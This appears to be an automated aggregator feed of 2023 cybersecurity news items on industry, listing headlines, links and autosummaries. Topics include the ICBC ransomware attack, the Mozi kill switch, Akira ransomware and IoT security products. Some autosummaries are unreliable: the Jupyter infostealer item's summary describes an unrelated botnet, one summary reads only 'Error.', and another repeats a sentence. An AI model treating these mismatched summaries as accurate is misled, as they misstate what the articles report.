    The Industrial and Commercial Bank of China (ICBC) suffered a ransomware attack that disrupted trades in the US Treasury market. The Industrial and Commercial Bank of China (ICBC) announced it has contained a ransomware attack that disrupted the U.S. Treasury market and impacted some fixed income and equities transactions “The Securities Industry and Financial Markets […]

    The post Industrial and Commercial Bank of China (ICBC) suffered a ransomware attack appeared first on Security Affairs.

    "

    Autosummary: The Industrial and Commercial Bank of China (ICBC) announced it has contained a ransomware attack that disrupted the U.S. Treasury market and impacted some fixed income and equities transactions “The Securities Industry and Financial Markets Association first told members on Wednesday that ICBC Financial Services had been hit by ransomware software, which paralyses computer systems unless a payment is made, several people familiar with the discussions said.” reported the Financial Times. "

    ---

    Industrial and Commercial Bank of China hit by ransomware attack

    financial exploits ransomware industry
    2023-11-09 https://www.bleepingcomputer.com/news/security/industrial-and-commercial-bank-of-china-hit-by-ransomware-attack/
    The Industrial & Commercial Bank of China (ICBC) is restoring systems and services following a ransomware attack that disrupted the U.S. Treasury market, causing equities clearing issues. [...] "

    Autosummary: ICBC is China"s largest bank and the largest commercial bank in the world by revenue, with revenue of $214.7 billion and profits of $53.5 billion reported in 2022, according to Fortune. "

    ---

    Phosphorus and Check Point integrate to provide xIoT visibility and protection

    industry
    2023-11-08 https://www.helpnetsecurity.com/2023/11/08/phosphorus-check-point/
    

    Phosphorus has integrated with Check Point to provide the asset-centric xIoT visibility at the network level. Phosphorus’s Intelligent Active Discovery (IAD) engine and device posture assessment capabilities are able to enrich network-centric technologies with previously unseen levels of high-resolution xIoT device detail, granular risk assessment context, and deep device metadata.​ This enables organizations to centralize visibility for all of their xIoT assets and facilitate decision-making in the Check Point security infrastructure. Phosphorus uses native device … More →

    The post Phosphorus and Check Point integrate to provide xIoT visibility and protection appeared first on Help Net Security.

    "

    Autosummary: Key integration benefits for customers include: xIoT visibility: Powered by Phosphorus’s IAD engine, the new integration utilizes the industry’s most advanced xIoT discovery capability which is 98% faster than traditional passive scanners, 95% more efficient (lighter) and provides 100% device certainty the first time.​ Powered by Phosphorus’s IAD engine, the new integration utilizes the industry’s most advanced xIoT discovery capability which is 98% faster than traditional passive scanners, 95% more efficient (lighter) and provides 100% device certainty the first time.​ Advanced risk posture view: Phosphorus’s evidence-based risk assessment capability collects over 3X more data points from xIoT assets than other services – including deep detail on devices running with default passwords, insecure configurations, vulnerable or outdated firmware, and more. "

    ---

    New Jupyter Infostealer Version Emerges with Sophisticated Stealth Tactics

    industry
    2023-11-06 https://thehackernews.com/2023/11/new-jupyter-infostealer-version-emerges.html
    An updated version of an information stealer malware known as Jupyter has resurfaced with "simple yet impactful changes" that aim to stealthily establish a persistent foothold on compromised systems. "The team has discovered new waves of Jupyter Infostealer attacks which leverage PowerShell command modifications and signatures of private keys in attempts to pass off the malware as a legitimately "

    Autosummary: Cybersecurity firm Bitsight, which revealed details of the service last week, said it identified at least 53 servers related to the botnet that are distributed across France, Bulgaria, Netherlands, and Sweden. "

    ---

    Mysterious Kill Switch Disrupts Mozi IoT Botnet Operations

    industry
    2023-11-02 https://thehackernews.com/2023/11/mysterious-kill-switch-disrupts-mozi.html
    The unexpected drop in malicious activity connected with the Mozi botnet in August 2023 was due to a kill switch that was distributed to the bots. "First, the drop manifested in India on August 8," ESET said in an analysis published this week. "A week later, on August 16, the same thing happened in China. While the mysterious control payload – aka kill switch – stripped Mozi bots of most "

    Autosummary: "

    ---

    Who killed Mozi? Finally putting the IoT zombie botnet in its grave

    industry
    2023-11-01 https://www.welivesecurity.com/en/eset-research/who-killed-mozi-finally-putting-the-iot-zombie-botnet-in-its-grave/
    How ESET Research found a kill switch that had been used to take down one of the most prolific botnets out there "

    Autosummary: The kill switch demonstrated several functionalities, including: killing the parent process, i.e., the original Mozi malware, disabling some system services such as sshd and dropbear, replacing the original Mozi file with itself, executing some router/device configuration commands, disabling access to various ports ( iptables -j DROP ), and ), and establishing the same foothold as the replaced original Mozi file We identified two versions of the control payload, with the latest one functioning as an envelope containing the first one with minor modifications, such as adding a function to ping a remote server, probably meant for statistical purposes. "

    ---

    Vulnerability management metrics: How to measure success

    exploits industry
    2023-10-31 https://www.helpnetsecurity.com/2023/10/31/vulnerability-management-metrics/
    

    Without the right metrics, vulnerability management is pretty pointless. If you’re not measuring, how do you know it’s working? So how do you know what to focus on? The list is potentially endless, and it can be hard to know what’s really important. In this article, we’ll help you identify the key metrics that you need to track the state of your vulnerability management program and create audit-ready reports that: Prove your security posture Meet … More →

    The post Vulnerability management metrics: How to measure success appeared first on Help Net Security.

    "

    Autosummary: In this article, we’ll help you identify the key metrics that you need to track the state of your vulnerability management program and create audit-ready reports that: Prove your security posture Meet vulnerability remediation SLAs and benchmarks Help pass audits and compliance Demonstrate ROI on security tools Simplify risk analysis Prioritize resource allocation Why vulnerability management needs metrics Measuring how quickly you find, prioritize and fix flaws allows you to continuously monitor and optimize your security.How long it takes to fix issues is down to you, and this gives you a current snapshot of your ‘cyber hygiene’ – the scan coverage, the time taken to fix issues over a period of six months, and the average time to fix issues overall.Modern scanners like Intruder provide automated, audit-ready reports, but it’s important to know where all your digital assets are to avoid blind spots, unpatched systems and inaccurate reporting – which is why asset discovery is integral to successful vulnerability management. "

    ---

    Dragos and Rockwell Automation strengthen ICS/OT cybersecurity threat detection for organizations

    industry ciber
    2023-10-31 https://www.helpnetsecurity.com/2023/10/31/dragos-rockwell-automation-partnership/
    

    Dragos announced the expansion of its combined capabilities in partnership with Rockwell Automation. With this expansion, Rockwell will be making the Dragos Platform available to organizations for enhanced ICS/OT cybersecurity threat detection, providing global deployment services and support capabilities to help customers operationalize their security investment. The threat detection capabilities build on the previous global agreement between Dragos and Rockwell for the OT Incident Response Retainer (IRR) program that helps industrial organizations prepare for, respond … More →

    The post Dragos and Rockwell Automation strengthen ICS/OT cybersecurity threat detection for organizations appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    IoT’s convenience comes with cybersecurity challenges

    industry ciber
    2023-10-30 https://www.helpnetsecurity.com/2023/10/30/iot-cybersecurity-concerns-video/
    

    The rapid proliferation of Internet of Things (IoT) devices has ushered in a new era of connectivity and convenience, transforming the way we live and work. However, this interconnectivity has also given rise to a host of cybersecurity challenges and vulnerabilities. Protecting the vast and diverse array of IoT devices, from smart home appliances to industrial sensors, has become an imperative in safeguarding data, privacy, and critical infrastructure. In this Help Net Security round-up, we … More →

    The post IoT’s convenience comes with cybersecurity challenges appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    IoT security threats highlight the need for zero trust principles

    industry
    2023-10-27 https://www.helpnetsecurity.com/2023/10/27/iot-malware-attacks/
    

    The high number of attacks on IoT devices represents a 400% increase in malware compared to the previous year, according to Zscaler. The increasing frequency of malware attacks targeting IoT devices is a significant concern for OT security, as the mobility of malware can facilitate movement across different networks, potentially endangering critical OT infrastructure. ThreatLabz focused on understanding IoT device activity and attributes via device fingerprinting and analyzing the IoT malware threat landscape. As more … More →

    The post IoT security threats highlight the need for zero trust principles appeared first on Help Net Security.

    "

    Autosummary: IoT malware threatens industrial manufacturing OT processes Manufacturing and retail accounted for nearly 52% of IoT device traffic, with 3D printers, geolocation trackers, industrial control devices, automotive multimedia systems, data collection terminals, and payment terminals sending the majority of signals over digital networks. "

    ---

    What is operational risk and why should you care? Assessing SEC rule readiness for OT and IoT

    industry
    2023-10-25 https://www.helpnetsecurity.com/2023/10/25/operational-risk/
    

    The newly released Security and Exchange Commission (SEC) cyber incident disclosure rules have been met with mixed reviews. Of particular concern is whether public companies who own and operate industrial control systems and connected IoT infrastructure are prepared to fully define operational risk, and therefore are equipped to fully disclose material business risk from cyber incidents. This concern also provides a fresh opportunity for preparedness. The rules require registrants to disclose material cybersecurity incidents (via … More →

    The post What is operational risk and why should you care? Assessing SEC rule readiness for OT and IoT appeared first on Help Net Security.

    "

    Autosummary: Security teams at public companies who have identified and outlined their operational risk and critical assets have three key objectives before December 15: to understand operational risk and map it to their company’s definitions of materiality to evaluate and take stock of OT/IoT assets not covered by existing IT security controls or capabilities to incorporate both assessments into reporting requirements outlined in the SEC rule for describing how the organization assesses, identifies, and manages material risks Avoiding vs. mitigating operational risk The reactive nature of cybersecurity has led to a reality in which boards and executive leaders attempt to mitigate risk by tasking security teams to avoid risk. Once critical assets are identified, they need to be categorized or inventoried, because your team will be incapable of performing root cause analysis on any asset that is not accounted for, monitored, baselined, hardened, or queried. "

    ---

    Versa Secure SD-LAN delivers zero trust and IoT security

    industry
    2023-10-24 https://www.helpnetsecurity.com/2023/10/24/versa-secure-sd-lan/
    

    Versa Networks announced Versa Secure SD-LAN, a software-defined branch and campus Local Area Network (LAN) solution to deliver zero trust and IoT security natively at the LAN Edge. This software-defined approach makes campus and branch networks more agile and integrated, and zero trust improves the security posture. For years, enterprises have grappled with the limitations and vendor lock-in from traditional LAN solutions. Legacy LAN architectures create painful operational challenges and cannot meet the evolving business … More →

    The post Versa Secure SD-LAN delivers zero trust and IoT security appeared first on Help Net Security.

    "

    Autosummary: Ethernet switches that deliver line rate L2, L3, VXLAN, and L4-7 security including firewall, application identification, adaptive micro-segmentation, IoT fingerprinting, and inline ZTNA.Pre-emptively adjusts traffic paths in real-time, automates troubleshooting, optimizes operations, reduces network downtime, and improves predictability.Converges routing, SD-WAN, SD-LAN, and security into a single branch appliance to deliver simplified management and lower Total Cost of Ownership (TCO). "

    ---

    Hackers backdoor Russian state, industrial orgs for data theft

    government industry rusia-ucrania
    2023-10-24 https://www.bleepingcomputer.com/news/security/hackers-backdoor-russian-state-industrial-orgs-for-data-theft/
    Several state and key industrial organizations in Russia were attacked with a custom Go-based backdoor that performs data theft, likely aiding espionage operations. [...] "

    Autosummary: Search disk for files of specific extensions (.doc, .docx, .pdf, .xls, .xlsx, .ppt, .pptx, .zip, .rar, .7z, .odt, .ods, .kdbx, .ovpn, .pem, .crt, .key) and transfer them to the C2. "

    ---

    Navigating OT/IT convergence and securing ICS environments

    industry
    2023-10-23 https://www.helpnetsecurity.com/2023/10/23/securing-control-systems-environment-video/
    

    Escalating threats to operational technology (OT) have prompted an increasing number of global enterprises to adopt sophisticated technologies and services to enhance the security of their assets. In this Help Net Security video, Christopher Warner, Senior GRC-OT Security Consultant at GuidePoint Security, discusses securing the control systems environment, as well as creating a cybersecurity roadmap. OT necessitates a systematic approach. Unique characteristics, such as the importance of safety and the critical nature of system uptime, … More →

    The post Navigating OT/IT convergence and securing ICS environments appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    US energy firm shares how Akira ransomware hacked its systems

    exploits ransomware industry
    2023-10-23 https://www.bleepingcomputer.com/news/security/us-energy-firm-shares-how-akira-ransomware-hacked-its-systems/
    In a rare display of transparency, US energy services firm BHI Energy details how the Akira ransomware operation breached their networks and stole the data during the attack. [...] "

    Autosummary: An investigation concluded on September 1, 2023, indicates that the following data was stolen: Full name Date of birth Social Security Number (SSN) Health information At the time of writing this, Akira ransomware has not leaked any data belonging to BHI on its extortion portal on the dark web, and neither have the cybercriminals announced BHI in their upcoming data leaks. "

    ---

    Jumio 360° Fraud Analytics identifies patterns based on behavioral similarities

    industry
    2023-10-23 https://www.helpnetsecurity.com/2023/10/23/jumio-360-fraud-analytics/
    

    Jumio unveiled Jumio 360° Fraud Analytics, its new fraud-fighting technology that uses AI-driven predictive analytics to identify fraud patterns with more sophistication and accuracy. According to Jumio’s analysis, 25% of fraud is interconnected — either perpetrated by fraud rings or by individuals using the same information or credentials to open new accounts on banking sites, ecommerce platforms, sharing economy sites and more. A single organized crime operation or fraud ring can cause damage into the … More →

    The post Jumio 360° Fraud Analytics identifies patterns based on behavioral similarities appeared first on Help Net Security.

    "

    Autosummary: Key features include: Graph database technology and machine learning classify identity transactions into clusters based on behavioral similarities, which is especially powerful for identifying fraud rings AI-driven predictive analytics determine the likelihood of fraud risk for each identity transaction based on its cluster association The predictive fraud score can be used to automatically reject identity transactions, stopping fraudsters from accessing your platform in real time Dashboards provide transparency and help you visualize connected data Jumio 360° Fraud Analytics is currently available in early release to select customers and will be generally available in early 2024. "

    ---

    Does the paper industry need to cut its water usage?

    industry
    2023-10-22 https://www.bbc.co.uk/news/business-67144689?at_medium=RSS&at_campaign=KARANGA
    Firms in the sector are using new technologies to reduce the amount of water they require. "

    Autosummary: "

    ---

    Super Mario Bros Wonder game a "notebook of chaos", critics say

    industry
    2023-10-20 https://www.bbc.co.uk/news/entertainment-arts-67167404?at_medium=RSS&at_campaign=KARANGA
    The latest Nintendo adventure follows the gang through the new Flower Kingdom. "

    Autosummary: "

    ---

    AuditBoard unveils AI and analytics capabilities to help teams automate critical workflows

    industry
    2023-10-19 https://www.helpnetsecurity.com/2023/10/19/auditboard-analytics/
    

    AuditBoard revealed powerful new capabilities purpose-built to enable teams to automate critical workflows, surface key strategic insights, and stay on top of proliferating risks. These new platform enhancements further deliver on the promise of AuditBoard’s modern connected risk model, which leverages innovative, purpose-built solutions to help teams surface and manage more risk, work smarter with greater impact, and engage front-line stakeholders: AuditBoard AI: The rapid increase in the volume and velocity of risk and compliance … More →

    The post AuditBoard unveils AI and analytics capabilities to help teams automate critical workflows appeared first on Help Net Security.

    "

    Autosummary: AuditBoard AI addresses this challenge by leveraging purpose-built, proprietary algorithms as well as the full spectrum of artificial intelligence technology, including generative AI, machine learning, and natural language processing to bring relevant insights, intelligent suggestions, and powerful automations across audit, risk, and compliance programs. "

    ---

    Sophisticated MATA Framework Strikes Eastern European Oil and Gas Companies

    industry
    2023-10-19 https://thehackernews.com/2023/10/sophisticated-mata-framework-strikes.html
    An updated version of a sophisticated backdoor framework called MATA has been used in attacks aimed at over a dozen Eastern European companies in the oil and gas sector and defense industry as part of a cyber espionage operation that took place between August 2022 and May 2023. "The actors behind the attack used spear-phishing mails to target several victims, some were infected with Windows "

    Autosummary: The cross-platform MATA framework was first documented by the Russian cybersecurity company in July 2020, linking it to the prolific North Korean state-sponsored crew in attacks targeting various sectors in Poland, Germany, Turkey, Korea, Japan, and India since April 2018. "

    ---

    The hot topics from Europe"s largest trade fair for IT security

    industry
    2023-10-19 https://www.malwarebytes.com/blog/news/2023/10/the-hot-topics-at-germany-s-it-sa
    

    Categories: News Categories: Ransomware Tags: IT-SA Tags: ransomware Tags: AI Tags: ChatGPT Tags: NIS2 The major talking points IT-SA included ransomware, ChatGPT, and NIS2. (Read more...)

    The post The hot topics from Europe"s largest trade fair for IT security appeared first on Malwarebytes Labs.

    "

    Autosummary: Businesses identified by the member states as operators of essential services in sectors such as energy, transport, water, banking, financial market infrastructures, healthcare, and digital infrastructure, will have to take appropriate security measures and notify relevant national authorities of serious incidents. All in all, I observed a lot of talks, and of the ones I heard that weren’t about promoting a product, most of them roughly fell into 3 categories: Ransomware, AI/ChatGPT, and NIS2. "

    ---

    Strengthening the weakest link: top 3 security awareness topics for your employees

    industry
    2023-10-19 https://www.welivesecurity.com/en/business-security/strengthening-weakest-link-top-3-security-awareness-topics-employees/
    Knowledge is a powerful weapon that can empower your employees to become the first line of defense against threats "

    Autosummary: Why training matters According to Verizon, three-quarters (74%) of all global breaches over the past year include the “human element,” which in many cases meant error, negligence or users falling victim to phishing and social engineering.One is threats from public Wi-Fi hotspots that might expose mobile workers to adversary-in-the-middle (AitM) attacks, where hackers access a network and eavesdrop on data travelling between connected devices and the router, and “evil twin” threats where criminals set up a duplicate Wi-Fi hotspot masquerading as a legitimate one in a specific location.Consider the following: 1) BEC and phishing Business Email Compromise (BEC) fraud, which leverages targeted phishing messages, remains one of the highest-earning cybercrime categories out there. "

    ---

    The evolution of deception tactics from traditional to cyber warfare

    industry
    2023-10-18 https://www.helpnetsecurity.com/2023/10/18/admiral-james-a-winnefeld-acalvio-technologies-cyber-warfare/
    

    Admiral James A. Winnefeld, USN (Ret.), is the former vice chairman of the Joint Chiefs of Staff and is an advisor to Acalvio Technologies. In this Help Net Security interview, he compares the strategies of traditional and cyber warfare, discusses the difficulty of determining the attack’s nature, addresses ethical dilemmas, and promotes collaboration and cooperation with allies, partners, and, in some cases, even adversaries. Admiral Winnefeld, given your vast experience in military strategy and operations, … More →

    The post The evolution of deception tactics from traditional to cyber warfare appeared first on Help Net Security.

    "

    Autosummary: In this Help Net Security interview, he compares the strategies of traditional and cyber warfare, discusses the difficulty of determining the attack’s nature, addresses ethical dilemmas, and promotes collaboration and cooperation with allies, partners, and, in some cases, even adversaries.This subtlety, combined with the constant evolution of cyber operations and capability, blurs the boundaries between random attacks, espionage, sabotage, and acts of warfare. Although not all countries or groups or individuals will adhere to international laws, having a clear understanding of the legal dimensions of cyber warfare will help clarify unacceptable parameters of attacks, including, for example, the loss of critical infrastructure systems that could harm large numbers of civilians. "

    ---

    ELITEWOLF: NSA’s repository of signatures and analytics to secure OT

    industry
    2023-10-17 https://www.helpnetsecurity.com/2023/10/17/elitewolf-nsa/
    

    Cyber entities continue to show a persistent interest in targeting critical infrastructure by taking advantage of vulnerable OT assets. To counter this threat, NSA has released a repository for OT Intrusion Detection Signatures and Analytics to the NSA Cyber GitHub. The capability, known as ELITEWOLF, can enable defenders of critical infrastructure, defense industrial base, and national security systems to identify and detect potentially malicious cyber activity in their OT environments. These signatures/analytics aren’t necessarily malicious … More →

    The post ELITEWOLF: NSA’s repository of signatures and analytics to secure OT appeared first on Help Net Security.

    "

    Autosummary: Error. "

    ---

    Inadequate IoT protection can be a costly mistake

    industry
    2023-10-16 https://www.helpnetsecurity.com/2023/10/16/iot-security-strategy/
    

    97% of organizations are struggling to secure their IoT and connected products to some degree, according to Keyfactor. The research survey also found that 98% of organizations experienced certificate outages in the last 12 months, costing an average of over $2.25 million. “Organizations worldwide are under mounting pressure to ensure their IoT and connected devices are protected while navigating an increasingly complex digital landscape that requires complete trust,” said Ellen Boehm, SVP, IoT Strategies and … More →

    The post Inadequate IoT protection can be a costly mistake appeared first on Help Net Security.

    "

    Autosummary: 88% of organizations agree that improvements are needed in the security of IoT and connected products in use within their organization, with 37% of respondents reporting that significant improvement is needed and 60% reporting that some improvement is needed. "

    ---

    Microsoft Defender thwarted Akira ransomware attack on an industrial engineering firm

    exploits ransomware industry
    2023-10-16 https://securityaffairs.com/152501/malware/akira-ransomware-attack-blocked.html
    

    Microsoft thwarted a large-scale hacking campaign carried out by Akira ransomware operators targeting an unknown industrial organization. Microsoft announced that its Microsoft Defender for Endpoint helped to block a large-scale hacking campaign carried out by Akira ransomware operators (tracked by Microsoft as Storm-1567) The attack took place in early June 2023 and aimed at an industrial engineering […]

    The post Microsoft Defender thwarted Akira ransomware attack on an industrial engineering firm appeared first on Security Affairs.

    "

    Autosummary: “This is why, as announced today, we added user containment to the automatic attack disruption capability in Microsoft Defender for Endpoint, a unique and innovative defense mechanism that stops human-operated attacks in their tracks” Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) "

    ---

    What does TikTok"s EGX sponsorship mean for the games industry?

    industry
    2023-10-14 https://www.bbc.co.uk/news/newsbeat-67099348?at_medium=RSS&at_campaign=KARANGA
    The app"s hoping to take on Twitch and YouTube to become the main stop for online video games content. "

    Autosummary: "

    ---

    23andMe hit with lawsuits after hacker leaks stolen genetics data

    industry
    2023-10-13 https://www.bleepingcomputer.com/news/security/23andme-hit-with-lawsuits-after-hacker-leaks-stolen-genetics-data/
    Genetic testing provider 23andMe faces multiple class action lawsuits in the U.S. following a large-scale data breach that is believed to have impacted millions of its customers. [...] "

    Autosummary: - Santana v. 23andMe, Inc. complaint The plaintiffs ask for various financial reliefs against 23andMe, including restitution, lifetime credit monitoring, actual, compensatory, and statutory damages and penalties, punitive damages, and coverage of attorney"s fees. "

    ---

    Simpson Manufacturing shuts down IT systems after cyberattack

    industry ciber
    2023-10-11 https://www.bleepingcomputer.com/news/security/simpson-manufacturing-shuts-down-it-systems-after-cyberattack/
    Simpson Manufacturing disclosed via a SEC 8-K filing a cybersecurity incident that has caused disruptions in its operations, which are expected to continue. [...] "

    Autosummary: "On October 10, 2023, Simpson Manufacturing Co., Inc. experienced disruptions in its Information Technology (IT) infrastructure and applications resulting from a cybersecurity incident," reads the statement. "

    ---

    Securing the future of Industry 4.0: WALLIX white paper reveals key strategies – get your copy today!

    industry
    2023-10-11 https://grahamcluley.com/feed-sponsor-wallix/
    Graham Cluley Security News is sponsored this week by the folks at WALLIX. Thanks to the great team there for their support! In the rapidly evolving landscape of Industry 4.0, marked by rapid innovation and unparalleled connectivity, safeguarding your critical assets is non-negotiable. As industries like Manufacturing, Utilities, Energy, and Transportation undergo profound digital transformations, … Continue reading "Securing the future of Industry 4.0: WALLIX white paper reveals key strategies – get your copy today!" "

    Autosummary: "

    ---

    Warning AI industry could use as much energy as the Netherlands

    industry
    2023-10-10 https://www.bbc.co.uk/news/technology-67053139?at_medium=RSS&at_campaign=KARANGA
    A new study looks at the environmental impact of artificial intelligence if current trends continue. "

    Autosummary: "

    ---

    High-Severity Flaws in ConnectedIO"s 3G/4G Routers Raise Concerns for IoT Security

    industry
    2023-10-09 https://thehackernews.com/2023/10/high-severity-flaws-in-connectedios.html
    Multiple high-severity security vulnerabilities have been disclosed in ConnectedIO"s ER2000 edge routers and the cloud-based management platform that could be exploited by malicious actors to execute malicious code and access sensitive data. "An attacker could have leveraged these flaws to fully compromise the cloud infrastructure, remotely execute code, and leak all customer and device "

    Autosummary: Flaws have also been unearthed in the communication protocol (i.e., MQTT) used between the devices and the cloud, including the use of hard-coded authentication credentials, that could be used to register a rogue device and access MQTT messages containing device identifiers, Wi-Fi settings, SSIDs, and passwords from routers. "

    ---

    Gaza-Linked Cyber Threat Actor Targets Israeli Energy and Defense Sectors

    industry
    2023-10-09 https://thehackernews.com/2023/10/gaza-linked-cyber-threat-actor-targets.html
    A Gaza-based threat actor has been linked to a series of cyber attacks aimed at Israeli private-sector energy, defense, and telecommunications organizations. Microsoft, which revealed details of the activity in its fourth annual Digital Defense Report, is tracking the campaign under the name Storm-1133. "We assess this group works to further the interests of Hamas, a Sunni militant group that is "

    Autosummary: "

    ---

    Genetics firm 23andMe says user data stolen in credential stuffing attack

    industry
    2023-10-06 https://www.bleepingcomputer.com/news/security/genetics-firm-23andme-says-user-data-stolen-in-credential-stuffing-attack/
    23andMe has confirmed to BleepingComputer that it is aware of user data from its platform circulating on hacker forums and attributes the leak to a credential-stuffing attack. [...] "

    Autosummary: "

    ---

    Eyes everywhere: How to safely navigate the IoT video revolution

    industry
    2023-10-05 https://www.helpnetsecurity.com/2023/10/05/connected-devices-cameras/
    

    Cameras are coming to a connected device near you. Cheap image sensors from old mobile phones are flooding the market and bringing video to the Internet of Things (IoT). Vacuum cleaners, bird feeders, connected cars and even smart ovens now come loaded with cameras that recognize the dish and suggest remaining cooking times. This is a major shift in the functionality of connected devices, which now number more than 15 million globally. At the same … More →

    The post Eyes everywhere: How to safely navigate the IoT video revolution appeared first on Help Net Security.

    "

    Autosummary: To navigate this evolution, device creators must ensure safety, and users should customize, decentralize, and prioritize trusted brands.Moreover, these connections are encrypted to ensure that data is authenticated, confidential, and uncompromised. Vacuum cleaners, bird feeders, connected cars and even smart ovens now come loaded with cameras that recognize the dish and suggest remaining cooking times. "

    ---

    Researchers warn of 100,000 industrial control systems exposed online

    industry
    2023-10-04 https://www.bleepingcomputer.com/news/security/researchers-warn-of-100-000-industrial-control-systems-exposed-online/
    About 100,000 industrial control systems (ICS) were found on the public web, exposed to attackers probing them for vulnerabilities and at risk of unauthorized access. Among them are power grids, traffic light systems, security and water systems. [...] "

    Autosummary: The most exposed countries in terms of how many organizations have at least one exposed ICSs in them are: United States Canada Italy United Kingdom France Netherlands Germany Spain Poland Sweden Global exposure of ICSs (BitSight) "

    ---

    National Logistics Portal (NLP) data leak: seaports in India were left vulnerable to takeover by hackers

    industry
    2023-10-02 https://securityaffairs.com/151819/data-breach/national-logistics-portal-nlp-data-leak.html
    

    The National Logistics Portal (NLP), a newly launched platform to manage all port operations in India, left public access to sensitive data, posing the risk of a potential takeover by threat actors. On September 24th, researchers discovered that the NLP platform was exposing sensitive credentials, secrets, and encryption keys via publicly available JS files. In […]

    The post National Logistics Portal (NLP) data leak: seaports in India were left vulnerable to takeover by hackers appeared first on Security Affairs.

    "

    Autosummary: National Logistics Portal (NLP) data leak: seaports in India were left vulnerable to takeover by hackers Pierluigi Paganini October 02, 2023 October 02, 2023 The National Logistics Portal (NLP), a newly launched platform to manage all port operations in India, left public access to sensitive data, posing the risk of a potential takeover by threat actors. "

    ---

    SeeMetrics releases customizable Cybersecurity Performance Boards

    industry ciber
    2023-09-27 https://www.helpnetsecurity.com/2023/09/27/seemetrics-cybersecurity-performance-boards/
    

    SeeMetrics launched its latest innovation: Customizable Cybersecurity Performance Boards. This product launch marks a significant milestone as it allows security leaders to communicate their desired narrative to different stakeholders and in the context that matters most to them. This customization comes in two essential dimensions: Security leaders can now instantaneously create their own Cybersecurity Performance Boards, selecting from a library of ready-to-use metrics that align with their specific needs and goals. Secondly, the customization extends … More →

    The post SeeMetrics releases customizable Cybersecurity Performance Boards appeared first on Help Net Security.

    "

    Autosummary: Secondly, the customization extends to the metrics level as well, allowing leaders to set thresholds, filter business units, timeframes, asset types, geographic considerations and more in a dynamic way. "

    ---

    Threat Report: The High Tech Industry Targeted the Most with 46% of NLX-Tagged Attack Traffic

    industry
    2023-09-26 https://thehackernews.com/2023/09/threat-report-high-tech-industry.html
    How To Use This Report Enhance situational awareness of techniques used by threat actors Identify potential attacks targeting your industry Gain insights to help improve and accelerate your organization’s threat response Summary of Findings The Network Effect Threat Report offers insights based on unique data from Fastly’s Next-Gen WAF from Q2 2023 (April 1, 2023 to June 30, 2023). This report "

    Autosummary: When analyzing corresponding Autonomous Systems (AS) of NLX IP addresses, Akamai Connected Cloud (formerly Linode) accounted for the largest portion of NLX traffic (16%), followed by Amazon (15%), M247 Europe SRL (9%), DigitalOcean (6%) and Scaleway (5%)**.4: NLX Traffic by Industry Furthermore, nearly one-third (32%) of attacks analyzed in the NLX data were Traversal; while SQL Injection (SQLI) accounted for 28%, Cross Site Scripting (XSS) at 20%, OS Command Injection (CMDEXE) at 13%, and Log4j JNDI lookups (LOG4J-JNDI) at 7%. Before diving deeper into the attack observations, here are five key takeaways that we found most significant in our research, covering global traffic across multiple industries, including High Tech, Financial Services, Commerce, Education, and Media and entertainment.How To Use This Report Enhance situational awareness of techniques used by threat actors Identify potential attacks targeting your industry Gain insights to help improve and accelerate your organization"s threat response Summary of Findings The Network Effect Threat Report offers insights based on unique data from Fastly"s Next-Gen WAF from Q2 2023 (April 1, 2023 to June 30, 2023). Out-of-Band (OOB) Callbacks: Callback server domains are prevalent throughout NLX data, particularly in Log4j JNDI lookups, OS command injection, and Cross-Site Scripting (XSS) attacks. Observations During the Reporting Period, more than half (54%) of all attacks observed were tagged with NLX and the majority of IP addresses in NLX data were not focused on a single customer or industry but spread across multiple targets: 69% of IP addresses targeted multiple customers (Figure 2), and 64% targeted multiple industries. "

    ---

    APT and financial attacks on industrial organizations in H1 2023

    financial industry
    2023-09-25 https://ics-cert.kaspersky.com/publications/apt-and-financial-attacks-on-industrial-organizations-in-h1-2023/
    An overview of reports of APT and financial attacks on industrial enterprises, as well as related activities of groups that have been observed attacking industrial organizations and critical infrastructure facilities "

    Autosummary: Volt Typhoon/VANGUARD PANDA attacks Researchers from Microsoft have reported that a Chinese-speaking threat actor, Volt Typhoon, was able to establish persistent access inside critical infrastructure targets in the US, including the communications, manufacturing, utilities, transportation, construction, maritime, government, information technology, and education sectors.In the most recent campaign, the group targeted organizations in the communications, manufacturing, utilities, transportation, construction, maritime, government, information technology, and education sectors.Winnkit, a credential-dumping tool, a screenshotting tool, a process-hollowing tool, an SQL tool, Mimikatz, ForkPlayground, and proxy configuration tools.Infrastructure associated with the threat actor has been identified in more than 50 countries across North America, South America, Europe, Africa, Asia and Australia, targeting government networks, research facilities, and journalists.The tools used, which include commodity information stealers, RATs (such as AveMaria/Warzone RAT, LodaRAT), Python-based RATs and information stealers, and Python- and Meterpreter-based reverse shells, are delivered via phishing emails containing malicious LNK attachments and decoy PDF documents. Earth Longzhi attacks After several months of inactivity, Earth Longzhi (believed to be a sub-group of APT41) targeted healthcare, manufacturing, technology and government organizations in Taiwan, Thailand, the Philippines and Fiji. Middle East-related activity Mint Sandstorm/Charming Kitten attacks The threat actor Mint Sandstorm (aka Charming Kitten group, previously tracked as Phosphorous), which researchers believe is linked to the Iranian government, is conducting cyberattacks against US critical infrastructure, particularly organizations in the energy and transportation sectors. BlueDelta/Sofacy attacks According to Recorded Future’s Insikt Group and Ukraine’s Computer Emergency Response Team (CERT-UA), BlueDelta (aka Sofacy, APT28, Fancy Bear and Sednit) exploited vulnerabilities in Roundcube Webmail to hack more than 40 Ukrainian organizations, including government institutions and military entities connected to aviation infrastructure. Other detected malicious activity included listing processes, testing network connectivity, gathering user and group information, mounting shares, enumerating domain trust over WMI, and listing DNS zones over WMI. The attackers use a variety of techniques in these attacks, including password spraying, brute force, token theft, and session replay, to gain unauthorized access to cloud resources. APT attacks with CommonMagic and CloudWizard framework Kaspersky researchers discovered an ongoing campaign, active since Q3 2021, targeting government, agricultural and transportation organizations in the conflict-affected region of Eastern Europe, using a previously unknown malware set. Compromised organizations operate in various industries, including manufacturing, wealth management, insurance, and pharmaceuticals. "

    ---

    Alphv group claims the hack of Clarion, a global manufacturer of audio and video equipment for cars

    industry
    2023-09-24 https://securityaffairs.com/151299/data-breach/alphv-ransomware-hacked-clarion.html
    

    The Alphv ransomware group claims to have hacked Clarion, the global manufacturer of audio and video equipment for cars and other vehicles. The Alphv ransomware group added Clarion, the global manufacturer of audio and video equipment for cars and other vehicles, to the list of victims on its Tor leak site. Clarion Japan is the Japanese subsidiary […]

    The post Alphv group claims the hack of Clarion, a global manufacturer of audio and video equipment for cars appeared first on Security Affairs.

    "

